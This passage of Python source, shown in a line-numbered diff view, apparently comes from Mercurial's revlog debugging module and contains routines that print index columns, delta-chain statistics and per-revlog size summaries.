95 | 97 | def _p1_rev(index, rev, entry, hexfn): |
|
96 | 98 | return b"%d" % entry[constants.ENTRY_PARENT_1] |
|
97 | 99 | |
|
98 | 100 | |
|
99 | 101 | @debug_column(b"p1-nodeid", size=NODE_SIZE) |
|
100 | 102 | def _p1_node(index, rev, entry, hexfn): |
|
101 | 103 | parent = entry[constants.ENTRY_PARENT_1] |
|
102 | 104 | p_entry = index[parent] |
|
103 | 105 | return hexfn(p_entry[constants.ENTRY_NODE_ID]) |
|
104 | 106 | |
|
105 | 107 | |
|
106 | 108 | @debug_column(b"p2-rev", size=6, verbose=True) |
|
107 | 109 | def _p2_rev(index, rev, entry, hexfn): |
|
108 | 110 | return b"%d" % entry[constants.ENTRY_PARENT_2] |
|
109 | 111 | |
|
110 | 112 | |
|
111 | 113 | @debug_column(b"p2-nodeid", size=NODE_SIZE) |
|
112 | 114 | def _p2_node(index, rev, entry, hexfn): |
|
113 | 115 | parent = entry[constants.ENTRY_PARENT_2] |
|
114 | 116 | p_entry = index[parent] |
|
115 | 117 | return hexfn(p_entry[constants.ENTRY_NODE_ID]) |
|
116 | 118 | |
|
117 | 119 | |
|
118 | 120 | @debug_column(b"full-size", size=20, verbose=True) |
|
119 | 121 | def full_size(index, rev, entry, hexfn): |
|
120 | 122 | return b"%d" % entry[constants.ENTRY_DATA_UNCOMPRESSED_LENGTH] |
|
121 | 123 | |
|
122 | 124 | |
|
123 | 125 | @debug_column(b"delta-base", size=6, verbose=True) |
|
124 | 126 | def delta_base(index, rev, entry, hexfn): |
|
125 | 127 | return b"%d" % entry[constants.ENTRY_DELTA_BASE] |
|
126 | 128 | |
|
127 | 129 | |
|
128 | 130 | @debug_column(b"flags", size=2, verbose=True) |
|
129 | 131 | def flags(index, rev, entry, hexfn): |
|
130 | 132 | field = entry[constants.ENTRY_DATA_OFFSET] |
|
131 | 133 | field &= 0xFFFF |
|
132 | 134 | return b"%d" % field |
|
133 | 135 | |
|
134 | 136 | |
|
135 | 137 | @debug_column(b"comp-mode", size=4, verbose=True) |
|
136 | 138 | def compression_mode(index, rev, entry, hexfn): |
|
137 | 139 | return b"%d" % entry[constants.ENTRY_DATA_COMPRESSION_MODE] |
|
138 | 140 | |
|
139 | 141 | |
|
140 | 142 | @debug_column(b"data-offset", size=20, verbose=True) |
|
141 | 143 | def data_offset(index, rev, entry, hexfn): |
|
142 | 144 | field = entry[constants.ENTRY_DATA_OFFSET] |
|
143 | 145 | field >>= 16 |
|
144 | 146 | return b"%d" % field |
|
145 | 147 | |
|
146 | 148 | |
|
147 | 149 | @debug_column(b"chunk-size", size=10, verbose=True) |
|
148 | 150 | def data_chunk_size(index, rev, entry, hexfn): |
|
149 | 151 | return b"%d" % entry[constants.ENTRY_DATA_COMPRESSED_LENGTH] |
|
150 | 152 | |
|
151 | 153 | |
|
152 | 154 | @debug_column(b"sd-comp-mode", size=7, verbose=True) |
|
153 | 155 | def sidedata_compression_mode(index, rev, entry, hexfn): |
|
154 | 156 | compression = entry[constants.ENTRY_SIDEDATA_COMPRESSION_MODE] |
|
155 | 157 | if compression == constants.COMP_MODE_PLAIN: |
|
156 | 158 | return b"plain" |
|
157 | 159 | elif compression == constants.COMP_MODE_DEFAULT: |
|
158 | 160 | return b"default" |
|
159 | 161 | elif compression == constants.COMP_MODE_INLINE: |
|
160 | 162 | return b"inline" |
|
161 | 163 | else: |
|
162 | 164 | return b"%d" % compression |
|
163 | 165 | |
|
164 | 166 | |
|
165 | 167 | @debug_column(b"sidedata-offset", size=20, verbose=True) |
|
166 | 168 | def sidedata_offset(index, rev, entry, hexfn): |
|
167 | 169 | return b"%d" % entry[constants.ENTRY_SIDEDATA_OFFSET] |
|
168 | 170 | |
|
169 | 171 | |
|
170 | 172 | @debug_column(b"sd-chunk-size", size=10, verbose=True) |
|
171 | 173 | def sidedata_chunk_size(index, rev, entry, hexfn): |
|
172 | 174 | return b"%d" % entry[constants.ENTRY_SIDEDATA_COMPRESSED_LENGTH] |
|
173 | 175 | |
|
174 | 176 | |
|
175 | 177 | def debug_index( |
|
176 | 178 | ui, |
|
177 | 179 | repo, |
|
178 | 180 | formatter, |
|
179 | 181 | revlog, |
|
180 | 182 | full_node, |
|
181 | 183 | ): |
|
182 | 184 | """display index data for a revlog""" |
|
183 | 185 | if full_node: |
|
184 | 186 | hexfn = nodemod.hex |
|
185 | 187 | else: |
|
186 | 188 | hexfn = nodemod.short |
|
187 | 189 | |
|
188 | 190 | idlen = 12 |
|
189 | 191 | for i in revlog: |
|
190 | 192 | idlen = len(hexfn(revlog.node(i))) |
|
191 | 193 | break |
|
192 | 194 | |
|
193 | 195 | fm = formatter |
|
194 | 196 | |
|
195 | 197 | header_pieces = [] |
|
196 | 198 | for column in INDEX_ENTRY_DEBUG_COLUMN: |
|
197 | 199 | if column.verbose_only and not ui.verbose: |
|
198 | 200 | continue |
|
199 | 201 | size = column.get_size(idlen) |
|
200 | 202 | name = column.name |
|
201 | 203 | header_pieces.append(name.rjust(size)) |
|
202 | 204 | |
|
203 | 205 | fm.plain(b' '.join(header_pieces) + b'\n') |
|
204 | 206 | |
|
205 | 207 | index = revlog.index |
|
206 | 208 | |
|
207 | 209 | for rev in revlog: |
|
208 | 210 | fm.startitem() |
|
209 | 211 | entry = index[rev] |
|
210 | 212 | first = True |
|
211 | 213 | for column in INDEX_ENTRY_DEBUG_COLUMN: |
|
212 | 214 | if column.verbose_only and not ui.verbose: |
|
213 | 215 | continue |
|
214 | 216 | if not first: |
|
215 | 217 | fm.plain(b' ') |
|
216 | 218 | first = False |
|
217 | 219 | |
|
218 | 220 | size = column.get_size(idlen) |
|
219 | 221 | value = column.value_func(index, rev, entry, hexfn) |
|
220 | 222 | display = b"%%%ds" % size |
|
221 | 223 | fm.write(column.name, display, value) |
|
222 | 224 | fm.plain(b'\n') |
|
223 | 225 | |
|
224 | 226 | fm.end() |
|
225 | 227 | |
|
226 | 228 | |
|
227 | 229 | def dump(ui, revlog): |
|
228 | 230 | """perform the work for `hg debugrevlog --dump""" |
|
229 | 231 | # XXX seems redundant with debug index ? |
|
230 | 232 | r = revlog |
|
231 | 233 | numrevs = len(r) |
|
232 | 234 | ui.write( |
|
233 | 235 | ( |
|
234 | 236 | b"# rev p1rev p2rev start end deltastart base p1 p2" |
|
235 | 237 | b" rawsize totalsize compression heads chainlen\n" |
|
236 | 238 | ) |
|
237 | 239 | ) |
|
238 | 240 | ts = 0 |
|
239 | 241 | heads = set() |
|
240 | 242 | |
|
241 | 243 | for rev in range(numrevs): |
|
242 | 244 | dbase = r.deltaparent(rev) |
|
243 | 245 | if dbase == -1: |
|
244 | 246 | dbase = rev |
|
245 | 247 | cbase = r.chainbase(rev) |
|
246 | 248 | clen = r.chainlen(rev) |
|
247 | 249 | p1, p2 = r.parentrevs(rev) |
|
248 | 250 | rs = r.rawsize(rev) |
|
249 | 251 | ts = ts + rs |
|
250 | 252 | heads -= set(r.parentrevs(rev)) |
|
251 | 253 | heads.add(rev) |
|
252 | 254 | try: |
|
253 | 255 | compression = ts / r.end(rev) |
|
254 | 256 | except ZeroDivisionError: |
|
255 | 257 | compression = 0 |
|
256 | 258 | ui.write( |
|
257 | 259 | b"%5d %5d %5d %5d %5d %10d %4d %4d %4d %7d %9d " |
|
258 | 260 | b"%11d %5d %8d\n" |
|
259 | 261 | % ( |
|
260 | 262 | rev, |
|
261 | 263 | p1, |
|
262 | 264 | p2, |
|
263 | 265 | r.start(rev), |
|
264 | 266 | r.end(rev), |
|
265 | 267 | r.start(dbase), |
|
266 | 268 | r.start(cbase), |
|
267 | 269 | r.start(p1), |
|
268 | 270 | r.start(p2), |
|
269 | 271 | rs, |
|
270 | 272 | ts, |
|
271 | 273 | compression, |
|
272 | 274 | len(heads), |
|
273 | 275 | clen, |
|
274 | 276 | ) |
|
275 | 277 | ) |
|
276 | 278 | |
|
277 | 279 | |
|
278 | 280 | def debug_revlog(ui, revlog): |
|
279 | 281 | """code for `hg debugrevlog`""" |
|
280 | 282 | r = revlog |
|
281 | 283 | format = r._format_version |
|
282 | 284 | v = r._format_flags |
|
283 | 285 | flags = [] |
|
284 | 286 | gdelta = False |
|
285 | 287 | if v & constants.FLAG_INLINE_DATA: |
|
286 | 288 | flags.append(b'inline') |
|
287 | 289 | if v & constants.FLAG_GENERALDELTA: |
|
288 | 290 | gdelta = True |
|
289 | 291 | flags.append(b'generaldelta') |
|
290 | 292 | if not flags: |
|
291 | 293 | flags = [b'(none)'] |
|
292 | 294 | |
|
293 | 295 | ### the total size of stored content if uncompressed.
|
294 | 296 | full_text_total_size = 0 |
|
295 | 297 | ### tracks merge vs single parent |
|
296 | 298 | nummerges = 0 |
|
297 | 299 | |
|
298 | 300 | ### tracks the ways the "delta" is built
|
299 | 301 | # nodelta |
|
300 | 302 | numempty = 0 |
|
301 | 303 | numemptytext = 0 |
|
302 | 304 | numemptydelta = 0 |
|
303 | 305 | # full file content |
|
304 | 306 | numfull = 0 |
|
305 | 307 | # intermediate snapshot against a prior snapshot |
|
306 | 308 | numsemi = 0 |
|
307 | 309 | # snapshot count per depth |
|
308 | 310 | numsnapdepth = collections.defaultdict(lambda: 0) |
|
309 | 311 | # number of snapshots with a non-ancestor delta |
|
310 | 312 | numsnapdepth_nad = collections.defaultdict(lambda: 0) |
|
311 | 313 | # delta against previous revision |
|
312 | 314 | numprev = 0 |
|
313 | 315 | # delta against prev, where prev is a non-ancestor |
|
314 | 316 | numprev_nad = 0 |
|
315 | 317 | # delta against first or second parent (not prev) |
|
316 | 318 | nump1 = 0 |
|
317 | 319 | nump2 = 0 |
|
318 | 320 | # delta against neither prev nor parents |
|
319 | 321 | numother = 0 |
|
320 | 322 | # delta against other that is a non-ancestor |
|
321 | 323 | numother_nad = 0 |
|
322 | 324 | # delta against prev that are also first or second parent |
|
323 | 325 | # (details of `numprev`) |
|
324 | 326 | nump1prev = 0 |
|
325 | 327 | nump2prev = 0 |
|
326 | 328 | |
|
327 | 329 | # data about the delta chain of each rev
|
328 | 330 | chainlengths = [] |
|
329 | 331 | chainbases = [] |
|
330 | 332 | chainspans = [] |
|
331 | 333 | |
|
332 | 334 | # data about each revision |
|
333 | 335 | datasize = [None, 0, 0] |
|
334 | 336 | fullsize = [None, 0, 0] |
|
335 | 337 | semisize = [None, 0, 0] |
|
336 | 338 | # snapshot count per depth |
|
337 | 339 | snapsizedepth = collections.defaultdict(lambda: [None, 0, 0]) |
|
338 | 340 | deltasize = [None, 0, 0] |
|
339 | 341 | chunktypecounts = {} |
|
340 | 342 | chunktypesizes = {} |
|
341 | 343 | |
|
342 | 344 | def addsize(size, l): |
|
343 | 345 | if l[0] is None or size < l[0]: |
|
344 | 346 | l[0] = size |
|
345 | 347 | if size > l[1]: |
|
346 | 348 | l[1] = size |
|
347 | 349 | l[2] += size |
|
348 | 350 | |
|
349 | 351 | with r.reading(): |
|
350 | 352 | numrevs = len(r) |
|
351 | 353 | for rev in range(numrevs): |
|
352 | 354 | p1, p2 = r.parentrevs(rev) |
|
353 | 355 | delta = r.deltaparent(rev) |
|
354 | 356 | if format > 0: |
|
355 | 357 | s = r.rawsize(rev) |
|
356 | 358 | full_text_total_size += s |
|
357 | 359 | addsize(s, datasize) |
|
358 | 360 | if p2 != nodemod.nullrev: |
|
359 | 361 | nummerges += 1 |
|
360 | 362 | size = r.length(rev) |
|
361 | 363 | if delta == nodemod.nullrev: |
|
362 | 364 | chainlengths.append(0) |
|
363 | 365 | chainbases.append(r.start(rev)) |
|
364 | 366 | chainspans.append(size) |
|
365 | 367 | if size == 0: |
|
366 | 368 | numempty += 1 |
|
367 | 369 | numemptytext += 1 |
|
368 | 370 | else: |
|
369 | 371 | numfull += 1 |
|
370 | 372 | numsnapdepth[0] += 1 |
|
371 | 373 | addsize(size, fullsize) |
|
372 | 374 | addsize(size, snapsizedepth[0]) |
|
373 | 375 | else: |
|
374 | 376 | nad = ( |
|
375 | 377 | delta != p1 |
|
376 | 378 | and delta != p2 |
|
377 | 379 | and not r.isancestorrev(delta, rev) |
|
378 | 380 | ) |
|
379 | 381 | chainlengths.append(chainlengths[delta] + 1) |
|
380 | 382 | baseaddr = chainbases[delta] |
|
381 | 383 | revaddr = r.start(rev) |
|
382 | 384 | chainbases.append(baseaddr) |
|
383 | 385 | chainspans.append((revaddr - baseaddr) + size) |
|
384 | 386 | if size == 0: |
|
385 | 387 | numempty += 1 |
|
386 | 388 | numemptydelta += 1 |
|
387 | 389 | elif r.issnapshot(rev): |
|
388 | 390 | addsize(size, semisize) |
|
389 | 391 | numsemi += 1 |
|
390 | 392 | depth = r.snapshotdepth(rev) |
|
391 | 393 | numsnapdepth[depth] += 1 |
|
392 | 394 | if nad: |
|
393 | 395 | numsnapdepth_nad[depth] += 1 |
|
394 | 396 | addsize(size, snapsizedepth[depth]) |
|
395 | 397 | else: |
|
396 | 398 | addsize(size, deltasize) |
|
397 | 399 | if delta == rev - 1: |
|
398 | 400 | numprev += 1 |
|
399 | 401 | if delta == p1: |
|
400 | 402 | nump1prev += 1 |
|
401 | 403 | elif delta == p2: |
|
402 | 404 | nump2prev += 1 |
|
403 | 405 | elif nad: |
|
404 | 406 | numprev_nad += 1 |
|
405 | 407 | elif delta == p1: |
|
406 | 408 | nump1 += 1 |
|
407 | 409 | elif delta == p2: |
|
408 | 410 | nump2 += 1 |
|
409 | 411 | elif delta != nodemod.nullrev: |
|
410 | 412 | numother += 1 |
|
411 | 413 | numother_nad += 1 |
|
412 | 414 | |
|
413 | 415 | # Obtain data on the raw chunks in the revlog. |
|
414 | 416 | if hasattr(r, '_inner'): |
|
415 | 417 | segment = r._inner.get_segment_for_revs(rev, rev)[1] |
|
416 | 418 | else: |
|
417 | 419 | segment = r._revlog._getsegmentforrevs(rev, rev)[1] |
|
418 | 420 | if segment: |
|
419 | 421 | chunktype = bytes(segment[0:1]) |
|
420 | 422 | else: |
|
421 | 423 | chunktype = b'empty' |
|
422 | 424 | |
|
423 | 425 | if chunktype not in chunktypecounts: |
|
424 | 426 | chunktypecounts[chunktype] = 0 |
|
425 | 427 | chunktypesizes[chunktype] = 0 |
|
426 | 428 | |
|
427 | 429 | chunktypecounts[chunktype] += 1 |
|
428 | 430 | chunktypesizes[chunktype] += size |
|
429 | 431 | |
|
430 | 432 | # Adjust size min value for empty cases |
|
431 | 433 | for size in (datasize, fullsize, semisize, deltasize): |
|
432 | 434 | if size[0] is None: |
|
433 | 435 | size[0] = 0 |
|
434 | 436 | |
|
435 | 437 | numdeltas = numrevs - numfull - numempty - numsemi |
|
436 | 438 | numoprev = numprev - nump1prev - nump2prev - numprev_nad |
|
437 | 439 | num_other_ancestors = numother - numother_nad |
|
438 | 440 | totalrawsize = datasize[2] |
|
439 | 441 | datasize[2] /= numrevs |
|
440 | 442 | fulltotal = fullsize[2] |
|
441 | 443 | if numfull == 0: |
|
442 | 444 | fullsize[2] = 0 |
|
443 | 445 | else: |
|
444 | 446 | fullsize[2] /= numfull |
|
445 | 447 | semitotal = semisize[2] |
|
446 | 448 | snaptotal = {} |
|
447 | 449 | if numsemi > 0: |
|
448 | 450 | semisize[2] /= numsemi |
|
449 | 451 | for depth in snapsizedepth: |
|
450 | 452 | snaptotal[depth] = snapsizedepth[depth][2] |
|
451 | 453 | snapsizedepth[depth][2] /= numsnapdepth[depth] |
|
452 | 454 | |
|
453 | 455 | deltatotal = deltasize[2] |
|
454 | 456 | if numdeltas > 0: |
|
455 | 457 | deltasize[2] /= numdeltas |
|
456 | 458 | totalsize = fulltotal + semitotal + deltatotal |
|
457 | 459 | avgchainlen = sum(chainlengths) / numrevs |
|
458 | 460 | maxchainlen = max(chainlengths) |
|
459 | 461 | maxchainspan = max(chainspans) |
|
460 | 462 | compratio = 1 |
|
461 | 463 | if totalsize: |
|
462 | 464 | compratio = totalrawsize / totalsize |
|
463 | 465 | |
|
464 | 466 | basedfmtstr = b'%%%dd\n' |
|
465 | 467 | basepcfmtstr = b'%%%dd %s(%%5.2f%%%%)\n' |
|
466 | 468 | |
|
467 | 469 | def dfmtstr(max): |
|
468 | 470 | return basedfmtstr % len(str(max)) |
|
469 | 471 | |
|
470 | 472 | def pcfmtstr(max, padding=0): |
|
471 | 473 | return basepcfmtstr % (len(str(max)), b' ' * padding) |
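# Illustrative note on the %%-escaped templates above (values are examples
# only): dfmtstr(1234) expands to b'%4d\n', a right-aligned field as wide as
# the largest value, while pcfmtstr(1234) expands to b'%4d (%5.2f%%)\n' for
# "count (percentage)" rows.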
|
472 | 474 | |
|
473 | 475 | def pcfmt(value, total): |
|
474 | 476 | if total: |
|
475 | 477 | return (value, 100 * float(value) / total) |
|
476 | 478 | else: |
|
477 | 479 | return value, 100.0 |
|
478 | 480 | |
|
479 | 481 | ui.writenoi18n(b'format : %d\n' % format) |
|
480 | 482 | ui.writenoi18n(b'flags : %s\n' % b', '.join(flags)) |
|
481 | 483 | |
|
482 | 484 | ui.write(b'\n') |
|
483 | 485 | fmt = pcfmtstr(totalsize) |
|
484 | 486 | fmt2 = dfmtstr(totalsize) |
|
485 | 487 | ui.writenoi18n(b'revisions : ' + fmt2 % numrevs) |
|
486 | 488 | ui.writenoi18n(b' merges : ' + fmt % pcfmt(nummerges, numrevs)) |
|
487 | 489 | ui.writenoi18n( |
|
488 | 490 | b' normal : ' + fmt % pcfmt(numrevs - nummerges, numrevs) |
|
489 | 491 | ) |
|
490 | 492 | ui.writenoi18n(b'revisions : ' + fmt2 % numrevs) |
|
491 | 493 | ui.writenoi18n(b' empty : ' + fmt % pcfmt(numempty, numrevs)) |
|
492 | 494 | ui.writenoi18n( |
|
493 | 495 | b' text : ' |
|
494 | 496 | + fmt % pcfmt(numemptytext, numemptytext + numemptydelta) |
|
495 | 497 | ) |
|
496 | 498 | ui.writenoi18n( |
|
497 | 499 | b' delta : ' |
|
498 | 500 | + fmt % pcfmt(numemptydelta, numemptytext + numemptydelta) |
|
499 | 501 | ) |
|
500 | 502 | ui.writenoi18n( |
|
501 | 503 | b' snapshot : ' + fmt % pcfmt(numfull + numsemi, numrevs) |
|
502 | 504 | ) |
|
503 | 505 | for depth in sorted(numsnapdepth): |
|
504 | 506 | base = b' lvl-%-3d : ' % depth |
|
505 | 507 | count = fmt % pcfmt(numsnapdepth[depth], numrevs) |
|
506 | 508 | pieces = [base, count] |
|
507 | 509 | if numsnapdepth_nad[depth]: |
|
508 | 510 | pieces[-1] = count = count[:-1] # drop the final '\n' |
|
509 | 511 | more = b' non-ancestor-bases: ' |
|
510 | 512 | anc_count = fmt |
|
511 | 513 | anc_count %= pcfmt(numsnapdepth_nad[depth], numsnapdepth[depth]) |
|
512 | 514 | pieces.append(more) |
|
513 | 515 | pieces.append(anc_count) |
|
514 | 516 | ui.write(b''.join(pieces)) |
|
515 | 517 | ui.writenoi18n(b' deltas : ' + fmt % pcfmt(numdeltas, numrevs)) |
|
516 | 518 | ui.writenoi18n(b'revision size : ' + fmt2 % totalsize) |
|
517 | 519 | ui.writenoi18n( |
|
518 | 520 | b' snapshot : ' + fmt % pcfmt(fulltotal + semitotal, totalsize) |
|
519 | 521 | ) |
|
520 | 522 | for depth in sorted(numsnapdepth): |
|
521 | 523 | ui.write( |
|
522 | 524 | (b' lvl-%-3d : ' % depth) |
|
523 | 525 | + fmt % pcfmt(snaptotal[depth], totalsize) |
|
524 | 526 | ) |
|
525 | 527 | ui.writenoi18n(b' deltas : ' + fmt % pcfmt(deltatotal, totalsize)) |
|
526 | 528 | |
|
527 | 529 | letters = string.ascii_letters.encode('ascii') |
|
528 | 530 | |
|
529 | 531 | def fmtchunktype(chunktype): |
|
530 | 532 | if chunktype == b'empty': |
|
531 | 533 | return b' %s : ' % chunktype |
|
532 | 534 | elif chunktype in letters: |
|
533 | 535 | return b' 0x%s (%s) : ' % (nodemod.hex(chunktype), chunktype) |
|
534 | 536 | else: |
|
535 | 537 | return b' 0x%s : ' % nodemod.hex(chunktype) |
|
536 | 538 | |
|
537 | 539 | ui.write(b'\n') |
|
538 | 540 | ui.writenoi18n(b'chunks : ' + fmt2 % numrevs) |
|
539 | 541 | for chunktype in sorted(chunktypecounts): |
|
540 | 542 | ui.write(fmtchunktype(chunktype)) |
|
541 | 543 | ui.write(fmt % pcfmt(chunktypecounts[chunktype], numrevs)) |
|
542 | 544 | ui.writenoi18n(b'chunks size : ' + fmt2 % totalsize) |
|
543 | 545 | for chunktype in sorted(chunktypecounts): |
|
544 | 546 | ui.write(fmtchunktype(chunktype)) |
|
545 | 547 | ui.write(fmt % pcfmt(chunktypesizes[chunktype], totalsize)) |
|
546 | 548 | |
|
547 | 549 | ui.write(b'\n') |
|
548 | 550 | b_total = b"%d" % full_text_total_size |
|
549 | 551 | p_total = [] |
|
550 | 552 | while len(b_total) > 3: |
|
551 | 553 | p_total.append(b_total[-3:]) |
|
552 | 554 | b_total = b_total[:-3] |
|
553 | 555 | p_total.append(b_total) |
|
554 | 556 | p_total.reverse() |
|
555 | 557 | b_total = b' '.join(p_total) |
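# Worked example with a made-up value: full_text_total_size = 1234567 gives
# p_total == [b'1', b'234', b'567'] after the reverse, so the joined result
# printed below is b'1 234 567' (digits grouped by thousands with spaces).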
|
556 | 558 | |
|
557 | 559 | ui.write(b'\n') |
|
558 | 560 | ui.writenoi18n(b'total-stored-content: %s bytes\n' % b_total) |
|
559 | 561 | ui.write(b'\n') |
|
560 | 562 | fmt = dfmtstr(max(avgchainlen, maxchainlen, maxchainspan, compratio)) |
|
561 | 563 | ui.writenoi18n(b'avg chain length : ' + fmt % avgchainlen) |
|
562 | 564 | ui.writenoi18n(b'max chain length : ' + fmt % maxchainlen) |
|
563 | 565 | ui.writenoi18n(b'max chain reach : ' + fmt % maxchainspan) |
|
564 | 566 | ui.writenoi18n(b'compression ratio : ' + fmt % compratio) |
|
565 | 567 | |
|
566 | 568 | if format > 0: |
|
567 | 569 | ui.write(b'\n') |
|
568 | 570 | ui.writenoi18n( |
|
569 | 571 | b'uncompressed data size (min/max/avg) : %d / %d / %d\n' |
|
570 | 572 | % tuple(datasize) |
|
571 | 573 | ) |
|
572 | 574 | ui.writenoi18n( |
|
573 | 575 | b'full revision size (min/max/avg) : %d / %d / %d\n' |
|
574 | 576 | % tuple(fullsize) |
|
575 | 577 | ) |
|
576 | 578 | ui.writenoi18n( |
|
577 | 579 | b'inter-snapshot size (min/max/avg) : %d / %d / %d\n' |
|
578 | 580 | % tuple(semisize) |
|
579 | 581 | ) |
|
580 | 582 | for depth in sorted(snapsizedepth): |
|
581 | 583 | if depth == 0: |
|
582 | 584 | continue |
|
583 | 585 | ui.writenoi18n( |
|
584 | 586 | b' level-%-3d (min/max/avg) : %d / %d / %d\n' |
|
585 | 587 | % ((depth,) + tuple(snapsizedepth[depth])) |
|
586 | 588 | ) |
|
587 | 589 | ui.writenoi18n( |
|
588 | 590 | b'delta size (min/max/avg) : %d / %d / %d\n' |
|
589 | 591 | % tuple(deltasize) |
|
590 | 592 | ) |
|
591 | 593 | |
|
592 | 594 | if numdeltas > 0: |
|
593 | 595 | ui.write(b'\n') |
|
594 | 596 | fmt = pcfmtstr(numdeltas) |
|
595 | 597 | fmt2 = pcfmtstr(numdeltas, 4) |
|
596 | 598 | ui.writenoi18n( |
|
597 | 599 | b'deltas against prev : ' + fmt % pcfmt(numprev, numdeltas) |
|
598 | 600 | ) |
|
599 | 601 | if numprev > 0: |
|
600 | 602 | ui.writenoi18n( |
|
601 | 603 | b' where prev = p1 : ' + fmt2 % pcfmt(nump1prev, numprev) |
|
602 | 604 | ) |
|
603 | 605 | ui.writenoi18n( |
|
604 | 606 | b' where prev = p2 : ' + fmt2 % pcfmt(nump2prev, numprev) |
|
605 | 607 | ) |
|
606 | 608 | ui.writenoi18n( |
|
607 | 609 | b' other-ancestor : ' + fmt2 % pcfmt(numoprev, numprev) |
|
608 | 610 | ) |
|
609 | 611 | ui.writenoi18n( |
|
610 | 612 | b' unrelated : ' + fmt2 % pcfmt(numprev_nad, numprev)
|
611 | 613 | ) |
|
612 | 614 | if gdelta: |
|
613 | 615 | ui.writenoi18n( |
|
614 | 616 | b'deltas against p1 : ' + fmt % pcfmt(nump1, numdeltas) |
|
615 | 617 | ) |
|
616 | 618 | ui.writenoi18n( |
|
617 | 619 | b'deltas against p2 : ' + fmt % pcfmt(nump2, numdeltas) |
|
618 | 620 | ) |
|
619 | 621 | ui.writenoi18n( |
|
620 | 622 | b'deltas against ancs : ' |
|
621 | 623 | + fmt % pcfmt(num_other_ancestors, numdeltas) |
|
622 | 624 | ) |
|
623 | 625 | ui.writenoi18n( |
|
624 | 626 | b'deltas against other : ' |
|
625 | 627 | + fmt % pcfmt(numother_nad, numdeltas) |
|
626 | 628 | ) |
|
627 | 629 | |
|
628 | 630 | |
|
629 | 631 | def debug_delta_find(ui, revlog, rev, base_rev=nodemod.nullrev): |
|
630 | 632 | """display the search process for a delta""" |
|
631 | 633 | deltacomputer = deltautil.deltacomputer( |
|
632 | 634 | revlog, |
|
633 | 635 | write_debug=ui.write, |
|
634 | 636 | debug_search=not ui.quiet, |
|
635 | 637 | ) |
|
636 | 638 | |
|
637 | 639 | node = revlog.node(rev) |
|
638 | 640 | p1r, p2r = revlog.parentrevs(rev) |
|
639 | 641 | p1 = revlog.node(p1r) |
|
640 | 642 | p2 = revlog.node(p2r) |
|
641 | 643 | full_text = revlog.revision(rev) |
|
642 | 644 | btext = [full_text] |
|
643 | 645 | textlen = len(btext[0]) |
|
644 | 646 | cachedelta = None |
|
645 | 647 | flags = revlog.flags(rev) |
|
646 | 648 | |
|
647 | 649 | if base_rev != nodemod.nullrev: |
|
648 | 650 | base_text = revlog.revision(base_rev) |
|
649 | 651 | delta = mdiff.textdiff(base_text, full_text) |
|
650 | 652 | |
|
651 | 653 | cachedelta = (base_rev, delta, constants.DELTA_BASE_REUSE_TRY) |
|
652 | 654 | btext = [None] |
|
653 | 655 | |
|
654 | 656 | revinfo = revlogutils.revisioninfo( |
|
655 | 657 | node, |
|
656 | 658 | p1, |
|
657 | 659 | p2, |
|
658 | 660 | btext, |
|
659 | 661 | textlen, |
|
660 | 662 | cachedelta, |
|
661 | 663 | flags, |
|
662 | 664 | ) |
|
663 | 665 | |
|
664 | 666 | fh = revlog._datafp() |
|
665 | 667 | deltacomputer.finddeltainfo(revinfo, fh, target_rev=rev) |
|
666 | 668 | |
|
667 | 669 | |
|
668 | 670 | def debug_revlog_stats( |
|
669 | 671 | repo, fm, changelog: bool, manifest: bool, filelogs: bool |
|
670 | 672 | ): |
|
671 | 673 | """Format revlog statistics for debugging purposes |
|
672 | 674 | |
|
673 | 675 | fm: the output formatter. |
|
674 | 676 | """ |
|
675 | 677 | fm.plain(b'rev-count data-size inl type target \n') |
|
676 | 678 | |
|
677 | 679 | revlog_entries = [e for e in repo.store.walk() if e.is_revlog] |
|
678 | 680 | revlog_entries.sort(key=lambda e: (e.revlog_type, e.target_id)) |
|
679 | 681 | |
|
680 | 682 | for entry in revlog_entries: |
|
681 | 683 | if not changelog and entry.is_changelog: |
|
682 | 684 | continue |
|
683 | 685 | elif not manifest and entry.is_manifestlog: |
|
684 | 686 | continue |
|
685 | 687 | elif not filelogs and entry.is_filelog: |
|
686 | 688 | continue |
|
687 | 689 | rlog = entry.get_revlog_instance(repo).get_revlog() |
|
688 | 690 | fm.startitem() |
|
689 | 691 | nb_rev = len(rlog) |
|
690 | 692 | inline = rlog._inline |
|
691 | 693 | data_size = rlog._get_data_offset(nb_rev - 1) |
|
692 | 694 | |
|
693 | 695 | target = rlog.target |
|
694 | 696 | revlog_type = b'unknown' |
|
695 | 697 | revlog_target = b'' |
|
696 | 698 | if target[0] == constants.KIND_CHANGELOG: |
|
697 | 699 | revlog_type = b'changelog' |
|
698 | 700 | elif target[0] == constants.KIND_MANIFESTLOG: |
|
699 | 701 | revlog_type = b'manifest' |
|
700 | 702 | revlog_target = target[1] |
|
701 | 703 | elif target[0] == constants.KIND_FILELOG: |
|
702 | 704 | revlog_type = b'file' |
|
703 | 705 | revlog_target = target[1] |
|
704 | 706 | |
|
705 | 707 | fm.write(b'revlog.rev-count', b'%9d', nb_rev) |
|
706 | 708 | fm.write(b'revlog.data-size', b'%12d', data_size) |
|
707 | 709 | |
|
708 | 710 | fm.write(b'revlog.inline', b' %-3s', b'yes' if inline else b'no') |
|
709 | 711 | fm.write(b'revlog.type', b' %-9s', revlog_type) |
|
710 | 712 | fm.write(b'revlog.target', b' %s', revlog_target) |
|
711 | 713 | |
|
712 | 714 | fm.plain(b'\n') |
|
713 | 715 | |
|
714 | 716 | |
|
715 | 717 | class DeltaChainAuditor: |
|
716 | 718 | def __init__(self, revlog): |
|
717 | 719 | self._revlog = revlog |
|
718 | 720 | self._index = self._revlog.index |
|
719 | 721 | self._generaldelta = revlog.delta_config.general_delta |
|
720 | 722 | self._chain_size_cache = {} |
|
721 | 723 | # security to avoid crash on corrupted revlogs |
|
722 | 724 | self._total_revs = len(self._index) |
|
723 | 725 | |
|
724 | 726 | def revinfo(self, rev, size_info=True, dist_info=True, sparse_info=True): |
|
725 | 727 | e = self._index[rev] |
|
726 | 728 | compsize = e[constants.ENTRY_DATA_COMPRESSED_LENGTH] |
|
727 | 729 | uncompsize = e[constants.ENTRY_DATA_UNCOMPRESSED_LENGTH] |
|
728 | 730 | |
|
729 | 731 | base = e[constants.ENTRY_DELTA_BASE] |
|
730 | 732 | p1 = e[constants.ENTRY_PARENT_1] |
|
731 | 733 | p2 = e[constants.ENTRY_PARENT_2] |
|
732 | 734 | |
|
733 | 735 | # If a parent of a revision has an empty delta, we never try to
|
734 | 736 | # delta against that parent, but directly against the delta base of |
|
735 | 737 | # that parent (recursively). It avoids adding a useless entry in the |
|
736 | 738 | # chain. |
|
